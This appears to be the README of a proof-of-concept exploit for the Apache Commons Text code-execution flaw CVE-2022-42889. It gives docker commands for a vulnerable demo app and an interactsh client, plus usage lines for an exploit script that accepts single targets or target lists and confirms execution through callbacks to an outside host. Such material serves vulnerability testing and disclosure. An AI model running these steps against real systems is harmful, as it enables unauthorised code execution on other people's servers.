This is a Proof of Concept exploiting the vulnerability in Apache Commons Text [CVE-2022-42889]
Vulnerable versions : 1.5.0 to (not including) 1.10.0
Successful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary code on the vulnerable asset
Application developed by @securekomodo, is attached here.
This application can also be loaded from docker-registry
docker run -p 8080:8080 gokul2/text4shell-poc:latest
The application will be available at localhost:8080 now.
To verify the arbitrary Command Execution, we use interactsh, a tool to capture OOB interactions by @projectdiscovery.
Set-up interactsh client before executing the actual exploit.
docker run projectdiscovery/interactsh-client:latest
Take a note of the domain listed after starting the application
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Check for logs in the interactsh-client to validate the exploit.